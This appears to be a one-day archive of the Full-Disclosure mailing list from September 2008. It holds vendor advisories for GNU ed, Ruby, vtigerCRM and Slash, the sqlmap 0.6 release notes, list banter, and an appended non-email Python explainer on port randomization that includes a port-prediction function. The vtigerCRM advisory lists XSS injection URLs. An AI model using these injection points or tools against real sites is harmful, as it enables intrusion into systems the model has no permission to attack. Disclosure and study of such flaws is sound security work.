From pinar at pardus.org.tr Mon Sep 1 02:14:09 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Mon, 01 Sep 2008 04:14:09 +0300
Subject: [Full-disclosure] [PLSA 2008-34] GNU ed: Heap Overflow
Message-ID: <48BB41E1.90300@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-34          security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-09-01
Severity: 2
Type: Remote
------------------------------------------------------------------------

Summary
=======

A vulnerability was reported in GNU ed. A remote user can cause arbitrary code to be executed on the target user's system.

Description
===========

A remote user can create a specially crafted file that, when processed by the target user, will trigger a heap overflow and potentially execute arbitrary code on the target system. The code will run with the privileges of the target user. The vulnerability resides in strip_escapes() in signal.c.

Note: This vulnerability was found by Alfredo Ortega from Core Security Technologies.

Affected packages:

  Pardus 2008: ed, all before 1.0-9-2
  Pardus 2007: ed, all before 1.0-7-8

Resolution
==========

There are update(s) for ed. You can update them via Package Manager or with a single command from console:

  Pardus 2008: pisi up ed
  Pardus 2007: pisi up ed

References
==========

* http://bugs.pardus.org.tr/show_bug.cgi?id=8092
* http://www.securitytracker.com/alerts/2008/Aug/1020734.html
* http://lists.gnu.org/archive/html/bug-ed/2008-06/msg00000.html
------------------------------------------------------------------------

--
Pınar Yanardağ
Pardus Security Team
http://security.pardus.org.tr

From pinar at pardus.org.tr Mon Sep 1 02:22:30 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Mon, 01 Sep 2008 04:22:30 +0300
Subject: [Full-disclosure] [PLSA 2008-35] Ruby: Denial of Service
Message-ID: <48BB43D6.9090207@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-35          security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-09-01
Severity: 3
Type: Remote
------------------------------------------------------------------------

Summary
=======

A vulnerability has been reported in Ruby, which can be exploited by malicious people to cause a DoS (Denial of Service).

Description
===========

The vulnerability is caused due to an error in the REXML library when processing recursively nested XML entities. This can be exploited to cause a DoS via a specially crafted XML document.

Note: This vulnerability was found by Luka Treiber and Mitja Kolsek of ACROS Security.

Affected packages:

  Pardus 2008:
    ruby, all before 1.8.7_p72-17-5
    ruby-mode, all before 1.8.7_p72-17-5
  Pardus 2007:
    ruby, all before 1.8.7_p72-17-14
    ruby-mode, all before 1.8.7_p72-17-5

Resolution
==========

There are update(s) for ruby, ruby-mode. You can update them via Package Manager or with a single command from console:

  Pardus 2008: pisi up ruby ruby-mode
  Pardus 2007: pisi up ruby ruby-mode

References
==========

* http://security.pardus.org.tr/en/2008-35
* http://bugs.pardus.org.tr/show_bug.cgi?id=8044
* http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3790
* http://secunia.com/advisories/31602
------------------------------------------------------------------------

--
Pınar Yanardağ
Pardus Security Team
http://security.pardus.org.tr

From exibar at thelair.com Mon Sep 1 03:39:31 2008
From: exibar at thelair.com (Exibar)
Date: Sun, 31 Aug 2008 22:39:31 -0400
Subject: [Full-disclosure] [inbox] Monthly Hands-On Meetups
In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com>
Message-ID: <20080901024139.AA819304@lists.grok.org.uk>

This coming from the guy who basically insults everyone on the list at any chance he gets...

C'mon, you really are n3td3v right.....?

Exibar

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Professor Micheal Chatner
Sent: Sunday, August 31, 2008 5:20 PM
To: full-disclosure at lists.grok.org.uk
Subject: [inbox] [Full-disclosure] Monthly Hands-On Meetups

Hey Guys,

I was wondering if anyone would like to start something like a Full-Disclosure monthly group in cities all over the world. It could be like 2600 meetings except with real security professionals because personally I don't want to even talk to someone unless they have a CEH cert.

I just started a new job in digital forensics. It would be fun to meet other people who like hacking and trading Ubuntu tips and tricks!

Let me know what you think!

Professor Micheal Chatner, M.D., CISSP

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From Valdis.Kletnieks at vt.edu Mon Sep 1 04:55:56 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 31 Aug 2008 23:55:56 -0400
Subject: [Full-disclosure] [inbox] Monthly Hands-On Meetups
In-Reply-To: Your message of "Sun, 31 Aug 2008 22:39:31 EDT." <20080901024139.AA819304@lists.grok.org.uk>
References: <20080901024139.AA819304@lists.grok.org.uk>
Message-ID: <6089.1220241356@turing-police.cc.vt.edu>

On Sun, 31 Aug 2008 22:39:31 EDT, Exibar said:
> This coming from the guy who basically insults everyone on the list at any
> chance he gets...
>
> C'mon, you really are n3td3v right.....?

The phrase "I just started a new job in digital forensics." would tend to indicate otherwise...

From smenard at nbnet.nb.ca Mon Sep 1 04:07:48 2008
From: smenard at nbnet.nb.ca (Stephen Menard)
Date: Mon, 01 Sep 2008 00:07:48 -0300
Subject: [Full-disclosure] Monthly Hands-On Meetups
In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com>
References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com>
Message-ID: <48BB5C84.4070105@nbnet.nb.ca>

Professor Micheal Chatner wrote:
> I just started a new job in digital forensics. It would be fun to meet
> other people who like hacking and trading Ubuntu tips and tricks!
>
oh aren't you top of the class
> Let me know what you think!
> Professor Micheal Chatner, M.D., CISSP
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From fernando.gont at gmail.com Mon Sep 1 06:44:35 2008
From: fernando.gont at gmail.com (Fernando Gont)
Date: Mon, 01 Sep 2008 02:44:35 -0300
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
Message-ID: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com>

Folks,

We have published a revision of our IETF Internet-Draft about port randomization. It is available at:
http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt

(you can find the document in other fancy formats at: http://www.gont.com.ar/drafts/port-randomization/index.html)

This new revision of the document addresses the feedback we got from Amit Klein, Matthias Bethke, and Alfred Hoenes.

The abstract of the document is:

---- cut here ----
Recently, awareness has been raised about a number of "blind" attacks that can be performed against the Transmission Control Protocol (TCP) and similar protocols. The consequences of these attacks range from throughput-reduction to broken connections or data corruption. These attacks rely on the attacker's ability to guess or know the five-tuple (Protocol, Source Address, Destination Address, Source Port, Destination Port) that identifies the transport protocol instance to be attacked. This document describes a number of simple and efficient methods for the random selection of the client port number, such that the possibility of an attacker guessing the exact value is reduced. While this is not a replacement for cryptographic methods, the described port number randomization algorithms provide improved security/obfuscation with very little effort and without any key management overhead.

The algorithms described in this document are local policies that may be incrementally deployed, and that do not violate the specifications of any of the transport protocols that may benefit from them, such as TCP, UDP, UDP-lite, SCTP, DCCP, and RTP.
---- cut here ----

Any comments will be more than welcome.

Thanks!

Kind regards,

--
Fernando Gont
e-mail: fernando at gont.com.ar || fgont at acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

From exibar at thelair.com Mon Sep 1 06:53:16 2008
From: exibar at thelair.com (Exibar)
Date: Mon, 1 Sep 2008 01:53:16 -0400
Subject: [Full-disclosure] [inbox] Monthly Hands-On Meetups
In-Reply-To: <6089.1220241356@turing-police.cc.vt.edu>
Message-ID: <20080901061103.3533D337@lists.grok.org.uk>

hehe, true, but n3td3v basically claims to be the foremost security person in the world... Maybe he bought EnCase and thinks he's starting a new business...
Exibar

-----Original Message-----
From: Valdis.Kletnieks at vt.edu [mailto:Valdis.Kletnieks at vt.edu]
Sent: Sunday, August 31, 2008 11:56 PM
To: Exibar
Cc: 'Professor Micheal Chatner'; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups

On Sun, 31 Aug 2008 22:39:31 EDT, Exibar said:
> This coming from the guy who basically insults everyone on the list at any
> chance he gets...
>
> C'mon, you really are n3td3v right.....?

The phrase "I just started a new job in digital forensics." would tend to indicate otherwise...

From fernando.gont at gmail.com Mon Sep 1 07:51:53 2008
From: fernando.gont at gmail.com (Fernando Gont)
Date: Mon, 01 Sep 2008 03:51:53 -0300
Subject: [Full-disclosure] New IETF I-D-: Security Assessment of the Internet Protocol version 4
Message-ID: <48bb9215.08045a0a.324d.390b@mx.google.com>

Hello, folks,

We have published an IETF Internet-Draft entitled "Security Assessment of the Internet Protocol version 4", which is heavily based on the "Security Assessment of the Internet Protocol" that was recently released by the UK CPNI (http://www.cpni.gov.uk/Products/technicalnotes/3677.aspx).

The IETF I-D is available at: http://www.gont.com.ar/drafts/ip-security/index.html (and is also available at the IETF internet-drafts repository)

Our IETF I-D is an effort to take the results of the IP security assessment to the IETF, so that all the identified issues get documented in an official IETF document, and hopefully the IETF standards are modified as necessary.

Any feedback on the IETF I-D and/or the original UK CPNI document will be more than welcome.

Thanks!

Kind regards,
Fernando Gont

--
Fernando Gont
e-mail: fernando at gont.com.ar || fgont at acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

From james at djavul.furryhelix.webhop.org Mon Sep 1 09:30:02 2008
From: james at djavul.furryhelix.webhop.org (james at djavul.furryhelix.webhop.org)
Date: Mon, 1 Sep 2008 09:30:02 +0100
Subject: [Full-disclosure] everyone who quotes large amounts of text.
Message-ID: <20080901083002.GA30894@djavul.furryhelix.webhop.org>

Thedjatclubrock wrote:
> *snip vast quote here*
> lame...

Just using this as an example, but could we please trim quotes please? And it would be appreciated if people didn't quote pages and pages of junk, then just add a one line comment underneath.

I can't be the only one who this annoys, can I?

From fabian at datensalat.eu Mon Sep 1 10:24:01 2008
From: fabian at datensalat.eu (Fabian Fingerle)
Date: Mon, 1 Sep 2008 11:24:01 +0200
Subject: [Full-disclosure] Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101
Message-ID: <20080901112401.4a51701a@mobile.fabian.datensalat.eu>

Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101

References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3101
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3101
http://www.vtiger.de/

Description
vtigerCRM is an Open Source Customer Relationship Management (CRM) Software.
The application is vulnerable to simple Cross Site Scripting, which can be used for several issues.

Example
Assuming vtigerCRM is installed on http://localhost/vtigercrm/, one can inject JavaScript with:
http://localhost/vtigercrm/index.php?module=Products&action=index&parenttab=">
http://localhost/vtigercrm/index.php?module=Users&action=Authenticate&user_password=">
http://localhost/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string=">

Workaround/Fix
vtiger CRM Security Patch for 5.0.4 [1]

Disclosure Timeline
2008-07-28 Vendor contacted
2008-07-28 Vendor fixed issue in test environment
2008-07-30 Vendor released patch
2008-07-30 Vendor dev stated they'll release a second patch within days
2008-09-01 published advisory, no second patch from upstream yet

CVE Information
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3101 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright
This vulnerability was discovered by Fabian Fingerle [2] (published with help from Hanno Boeck [3]). It's licensed under the creative commons attribution license [4].

Fabian Fingerle, 2008-09-01

[1] http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1[action]=getviewdetailsfordownload&tx_abdownloads_pi1[uid]=128&tx_abdownloads_pi1[category_uid]=5&cHash=e16be773a5
[2] http://www.fabian-fingerle.de
[3] http://www.hboeck.de
[4] http://creativecommons.org/licenses/by/3.0/de/

--
_GPG_ 3D17 CAC8 1955 1908 65ED 5C51 FDA3 6A09 AB41 AB85
_chaos events near stuttgart_ www.datensalat.eu

From Valdis.Kletnieks at vt.edu Mon Sep 1 10:33:04 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 01 Sep 2008 05:33:04 -0400
Subject: [Full-disclosure] everyone who quotes large amounts of text.
In-Reply-To: Your message of "Mon, 01 Sep 2008 09:30:02 BST." <20080901083002.GA30894@djavul.furryhelix.webhop.org>
References: <20080901083002.GA30894@djavul.furryhelix.webhop.org>
Message-ID: <7555.1220261584@turing-police.cc.vt.edu>

On Mon, 01 Sep 2008 09:30:02 BST, james at furryhelix.webhop.org said:
> Thedjatclubrock wrote:
> > *snip vast quote here*
> > lame...
>
> Just using this as an example, but could we please trim quotes please?
> And it would be appreciated if people didn't quote pages and pages of
> junk, then just add a one line comment underneath.
> I can't be the only one who this annoys, can I?

It's almost enough to make you wish the bozos would top-post their one-line comment so you can hit delete as soon as you realize they're a top-posting bozo, rather than making you scroll all the way to the bottom to discover they're a different sort of bozo... ;)

From bernardo.damele at gmail.com Mon Sep 1 14:30:17 2008
From: bernardo.damele at gmail.com (Bernardo Damele A. G.)
Date: Mon, 01 Sep 2008 15:30:17 +0200
Subject: [Full-disclosure] [Tool] sqlmap 0.6 released
Message-ID: <48BBEE69.9060701@gmail.com>

Hi,

I am glad to release sqlmap version 0.6.

Introduction
============

sqlmap is an automatic SQL injection tool developed in Python.
Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.

Changes
=======

Some of the new features include:

* Added multithreading support to set the maximum number of concurrent HTTP requests.
* Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack.
* Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator.
* Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file.
* Implemented support for HTTPS requests over HTTP(S) proxy.
* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic.

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

Download
========

You can download it in various formats:

* Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.gz
* Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.bz2
* Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.zip
* DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6-1_all.deb
* RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6-1.noarch.rpm
* Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6_exe.zip

Note: the subversion repository is not accessible anymore so the only way to get the new release is to download it from one of the above links.

Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf
* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/

Happy hacking!

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile number: +39-3493821385
PGP Key ID: 0x05F5A30F

From fw at deneb.enyo.de Mon Sep 1 19:45:03 2008
From: fw at deneb.enyo.de (Florian Weimer)
Date: Mon, 01 Sep 2008 20:45:03 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1633-1] New slash packages fix multiple vulnerabilities
Message-ID: <87tzczr9hs.fsf@mid.deneb.enyo.de>

------------------------------------------------------------------------
Debian Security Advisory DSA-1633-1                  security at debian.org
http://www.debian.org/security/                           Florian Weimer
September 01, 2008                    http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : slash
Vulnerability  : SQL Injection, Cross-Site Scripting
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-2231, CVE-2008-2553
Debian Bug     : 484499

It has been discovered that Slash, the Slashdot Like Automated Storytelling Homepage suffers from two vulnerabilities related to insufficient input sanitation, leading to execution of SQL commands (CVE-2008-2231) and cross-site scripting (CVE-2008-2553).

For the stable distribution (etch), these problems have been fixed in version 2.2.6-8etch1.

In the unstable distribution (sid), the slash package is currently uninstallable and will be removed soon.

We recommend that you upgrade your slash package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

These files will probably be moved into the stable distribution on its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From coderman at gmail.com Mon Sep 1 20:41:49 2008
From: coderman at gmail.com (coderman)
Date: Mon, 1 Sep 2008 12:41:49 -0700
Subject: [Full-disclosure] everyone who quotes large amounts of text.
In-Reply-To: <7555.1220261584@turing-police.cc.vt.edu>
References: <20080901083002.GA30894@djavul.furryhelix.webhop.org> <7555.1220261584@turing-police.cc.vt.edu>
Message-ID: <4ef5fec60809011241v5985b413m56824e32b7f923b9@mail.gmail.com>

On Mon, Sep 1, 2008 at 2:33 AM, wrote:
> ... making you scroll all the way to the bottom

valdis: this is a known temporal denial of service attack. they can't make you do anything. please update your mental faculties to latest service pack...

From coderman at gmail.com Mon Sep 1 20:50:07 2008
From: coderman at gmail.com (coderman)
Date: Mon, 1 Sep 2008 12:50:07 -0700
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com>
Message-ID: <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com>

On Sun, Aug 31, 2008 at 10:44 PM, Fernando Gont wrote:
> ... IETF Internet-Draft about port randomization...

wget -qO - http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt | grep -i grsec

is still empty. why do you dismiss grsec?

From Valdis.Kletnieks at vt.edu Mon Sep 1 21:13:18 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 01 Sep 2008 16:13:18 -0400
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: Your message of "Mon, 01 Sep 2008 12:50:07 PDT." <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com>
Message-ID: <38325.1220299998@turing-police.cc.vt.edu>

On Mon, 01 Sep 2008 12:50:07 PDT, coderman said:
> On Sun, Aug 31, 2008 at 10:44 PM, Fernando Gont wrote:
> > ... IETF Internet-Draft about port randomization...
>
> wget -qO - http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt
> | grep -i grsec
>
> is still empty. why do you dismiss grsec?

Because he's writing about the *BASE* system kernel for Linux and the *BSD's. If he included grsec, he'd *also* have to start adding 'NetBSD does this, unless you've applied this patch to your kernel, in which case it does that, or if this other patch was added, making it do this instead...'

Or you can get Linus to merge the code in question. See the helpful info in the file Documentation/SubmittingPatches. You want to send them to the netdev at vger.kernel.org list for review, that's where the network developers hang out.

From rholgstad at gmail.com Mon Sep 1 21:51:35 2008
From: rholgstad at gmail.com (rholgstad)
Date: Mon, 01 Sep 2008 15:51:35 -0500
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: <38325.1220299998@turing-police.cc.vt.edu>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu>
Message-ID: <48BC55D7.3010109@gmail.com>

Linus doesn't care about security

Valdis.Kletnieks at vt.edu wrote:
> Or you can get Linus to merge the code in question. See the helpful info
> in the file Documentation/SubmittingPatches. You want to send them to the
> netdev at vger.kernel.org list for review, that's where the network developers
> hang out.
From Valdis.Kletnieks at vt.edu Mon Sep 1 23:23:26 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 01 Sep 2008 18:23:26 -0400
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: Your message of "Mon, 01 Sep 2008 15:51:35 CDT." <48BC55D7.3010109@gmail.com>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com>
Message-ID: <43513.1220307806@turing-police.cc.vt.edu>

On Mon, 01 Sep 2008 15:51:35 CDT, rholgstad said:
> Linus doesn't care about security

No, he actually *does* care about security - he's just of the opinion that security fixes don't automatically rate a 'ZOMG! PWNED!' flag on them like certain *BSD variants think. He thinks that sticking a big SECURITY PATCH tag on a fix tends to make people cherry-pick and install just those fixes - even though the patch they *didn't* install that fixes a system crash or a silent data corruption is actually more critical.

Your chances of getting it accepted improve greatly if you have a nice writeup of *why* the patch is a good idea - summarize the current state, explain how the new version works, list what attacks it minimizes.

Oh - and I *guarantee* that somebody will make a (quite valid) issue about the drain on the /dev/random entropy pool if you're using that as your (possibly indirect) source of random bits. You may want to make sure that you have either Kconfig magic for compile time selection, and/or a /sys file or something for runtime tweaking.

From fernando.gont at gmail.com Tue Sep 2 10:06:36 2008
From: fernando.gont at gmail.com (Fernando Gont)
Date: Tue, 02 Sep 2008 06:06:36 -0300
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com>
Message-ID: <48bd038b.1c1d640a.5688.3991@mx.google.com>

At 04:50 p.m. 01/09/2008, coderman wrote:
>On Sun, Aug 31, 2008 at 10:44 PM, Fernando Gont wrote:
> > ... IETF Internet-Draft about port randomization...
>
>wget -qO - http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt
>| grep -i grsec
>
>is still empty. why do you dismiss grsec?

Valdis has already answered your question. That said, the document itself is not a survey of what every OS or OS+patch does with respect to ephemeral ports, and that little survey we included is not meant to be complete (for instance, there's no description of what Windows does).

Also, the base Linux system already implements Algorithm #3. So I wonder why anybody would patch the Linux ephemeral port selection algorithm.... (unless it is to implement algorithm #4 of our draft).

Regarding me "dismissing" grsec, I tried to (but couldn't) get the guy whose e-mail address is available at the grsec web site to review one of the documents I have been working on, so that he could provide his perspective on each of the issues discussed.

P.S.: The "survey" section must be about 1% of the document. I'd be glad to hear comments on the rest of the document.
Kind regards,
--
Fernando Gont
e-mail: fernando at gont.com.ar || fgont at acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

From victor.harutyunyan at arca.am Tue Sep 2 08:23:36 2008
From: victor.harutyunyan at arca.am (victor.harutyunyan at arca.am)
Date: Tue, 02 Sep 2008 12:23:36 +0500
Subject: [Full-disclosure] test
Message-ID: <48BCE9F8.5030204@arca.am>

test

From p.labushev at gmail.com Tue Sep 2 10:17:43 2008
From: p.labushev at gmail.com (Pavel Labushev)
Date: Tue, 02 Sep 2008 17:17:43 +0800
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: <43513.1220307806@turing-police.cc.vt.edu>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com> <43513.1220307806@turing-police.cc.vt.edu>
Message-ID: <48BD04B7.60702@gmail.com>

Valdis.Kletnieks at vt.edu wrote:
> On Mon, 01 Sep 2008 15:51:35 CDT, rholgstad said:
>> Linus doesn't care about security
>
> No, he actually *does* care about security - he's just of the opinion
> that security fixes don't automatically rate a 'ZOMG! PWNED!' flag on
> them like certain *BSD variants think. He thinks that sticking a big

Linus is not a security expert. Not even close. He's not educated and not experienced enough to make security decisions, but he does. That's the problem. He cares somehow, but he's wrong.

> SECURITY PATCH tag on a fix tends to make people cherry-pick and install
> just those fixes - even though the patch they *didn't* install that
> fixes a system crash or a silent data corruption is actually more critical.

"SECURITY PATCH tag on a fix" helps me to know that there is the problem and I must consider the patch, check its correctness and maybe test/backport/apply it to my production systems ASAP. Just as other tags help me to know that there are reliability and other issues I must care about.
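Fernando Gont refers above to the draft's numbered algorithms without spelling them out, and the thread touches two practical points about them: the /dev/random entropy cost Valdis raises, and how well the hash-based scheme holds up if its key is seeded badly. The following is an added example, not code from the draft, from Linux, or from any poster in this thread. It puts Algorithm 1 (simple randomization: a fresh random draw per connection) beside Algorithm 3 (simple hash-based selection: one global counter plus a keyed per-destination offset, so random bits are spent once on the key at boot; this is the scheme the draft carried into RFC 6056 under the same number). predict_port shows the flip side: an attacker who knows the key, because it came from something guessable, and has learned the counter by watching a few connections can compute the port the host will use toward any destination. The port range, HMAC-SHA256 as the keyed hash F, the addresses and the all-zero demo key are this example's own assumptions.

```python
"""Ephemeral port selection per draft-ietf-tsvwg-port-randomization:
Algorithm 1 (simple randomization) beside Algorithm 3 (simple hash-based
selection), plus what a leaked or poorly seeded secret key gives an attacker.
Added example; not code from the draft, from Linux, or from the thread."""
import hashlib
import hmac
import os
import random

# Port range assumed for this example (the draft permits 1024-65535; Linux's
# default net.ipv4.ip_local_port_range at the time was 32768-61000).
MIN_EPHEMERAL = 32768
MAX_EPHEMERAL = 61000
NUM_EPHEMERAL = MAX_EPHEMERAL - MIN_EPHEMERAL + 1


def simple_randomization(local_ip, remote_ip, remote_port, in_use, rng=random):
    """Algorithm 1: draw a port uniformly at random, retry while that 4-tuple
    is taken. Every call spends fresh random bits (the entropy-pool cost),
    and a port just released toward the same peer can be drawn again at once."""
    for _ in range(NUM_EPHEMERAL):
        port = MIN_EPHEMERAL + rng.randrange(NUM_EPHEMERAL)
        conn = (local_ip, port, remote_ip, remote_port)
        if conn not in in_use:
            in_use.add(conn)
            return port
    raise OSError("ephemeral port range exhausted")


class HashBasedSelector:
    """Algorithm 3: port = min + (next_ephemeral + F(local_ip, remote_ip,
    remote_port, secret_key)) mod num_ephemeral. next_ephemeral is a single
    global counter, F a keyed hash; the only random draw is the key, once."""

    def __init__(self, secret_key=None):
        self.secret_key = os.urandom(16) if secret_key is None else secret_key
        self.next_ephemeral = 0

    def offset(self, local_ip, remote_ip, remote_port):
        """F(): per-destination offset. HMAC-SHA256 stands in for the keyed
        hash, which the draft leaves to the implementer (assumption here)."""
        msg = f"{local_ip}|{remote_ip}|{remote_port}".encode()
        digest = hmac.new(self.secret_key, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:4], "big") % NUM_EPHEMERAL

    def select(self, local_ip, remote_ip, remote_port, in_use):
        off = self.offset(local_ip, remote_ip, remote_port)
        for _ in range(NUM_EPHEMERAL):
            port = MIN_EPHEMERAL + (self.next_ephemeral + off) % NUM_EPHEMERAL
            self.next_ephemeral += 1  # advances on every attempt, not per success
            conn = (local_ip, port, remote_ip, remote_port)
            if conn not in in_use:
                in_use.add(conn)
                return port
        raise OSError("ephemeral port range exhausted")


def predict_port(secret_key, counter, local_ip, remote_ip, remote_port):
    """Attacker's view once the key is known (seeded from something guessable)
    and the counter has been learned from a few observed connections: the next
    port toward *any* destination is one hash away."""
    probe = HashBasedSelector(secret_key)
    off = probe.offset(local_ip, remote_ip, remote_port)
    return MIN_EPHEMERAL + (counter + off) % NUM_EPHEMERAL


def demo(secret_key=b"\x00" * 16):
    """Walk-through with a fixed all-zero key purely so it is reproducible.
    Ports toward 192.0.2.10 come out consecutive (they share one offset),
    while the connection to 198.51.100.7 in between lands somewhere else."""
    sel = HashBasedSelector(secret_key)
    in_use = set()
    to_a = [sel.select("10.0.0.2", "192.0.2.10", 80, in_use) for _ in range(3)]
    to_b = sel.select("10.0.0.2", "198.51.100.7", 443, in_use)
    to_a_again = sel.select("10.0.0.2", "192.0.2.10", 80, in_use)
    return {"to_a": to_a, "to_b": to_b, "to_a_again": to_a_again,
            "counter": sel.next_ephemeral}


if __name__ == "__main__":
    print(demo())
```

Run stand-alone it prints the selections; the property to look at is that the fourth connection to 192.0.2.10 is four ports past the first one, because the global counter moved on during the unrelated connection, and that predict_port reproduces every choice once the key and counter are known. A key from a CSPRNG seeded at boot makes the offset opaque to an off-path attacker; a key derived from the boot time or a fixed constant does not, which is the point of seeding it properly.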
